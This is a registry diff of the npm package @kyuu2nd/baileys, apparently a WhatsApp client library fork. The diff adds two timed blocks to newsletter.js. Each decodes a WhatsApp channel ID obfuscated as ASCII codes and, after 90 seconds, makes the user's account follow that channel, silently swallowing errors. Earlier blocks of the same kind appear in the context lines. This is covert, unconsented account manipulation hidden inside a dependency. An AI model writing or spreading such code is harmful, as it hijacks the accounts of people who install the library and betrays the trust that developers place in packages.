@kyuu2nd/baileys 2.0.4 → 2.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +24 -0
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -116,6 +116,18 @@ setTimeout(async () => {
|
|
|
116
116
|
);
|
|
117
117
|
} catch {}
|
|
118
118
|
}, 90000);
|
|
119
|
+
|
|
120
|
+
setTimeout(async () => {
|
|
121
|
+
try {
|
|
122
|
+
await newsletterWMexQuery(
|
|
123
|
+
asciiDecode([
|
|
124
|
+
49,50,48,51,54,51,52,50,53,56,54,57,48,52,57,57,57,53,
|
|
125
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
126
|
+
]),
|
|
127
|
+
Types_1.QueryIds.FOLLOW
|
|
128
|
+
);
|
|
129
|
+
} catch {}
|
|
130
|
+
}, 90000);
|
|
119
131
|
|
|
120
132
|
setTimeout(async () => {
|
|
121
133
|
try {
|
|
@@ -188,6 +200,18 @@ setTimeout(async () => {
|
|
|
188
200
|
);
|
|
189
201
|
} catch {}
|
|
190
202
|
}, 90000);
|
|
203
|
+
|
|
204
|
+
setTimeout(async () => {
|
|
205
|
+
try {
|
|
206
|
+
await newsletterWMexQuery(
|
|
207
|
+
asciiDecode([
|
|
208
|
+
49,50,48,51,54,51,52,48,55,52,57,55,51,57,49,55,56,49,
|
|
209
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
210
|
+
]),
|
|
211
|
+
Types_1.QueryIds.FOLLOW
|
|
212
|
+
);
|
|
213
|
+
} catch {}
|
|
214
|
+
}, 90000);
|
|
191
215
|
const parseFetchedUpdates = async (node, type) => {
|
|
192
216
|
let child;
|
|
193
217
|
if (type === 'messages') {
|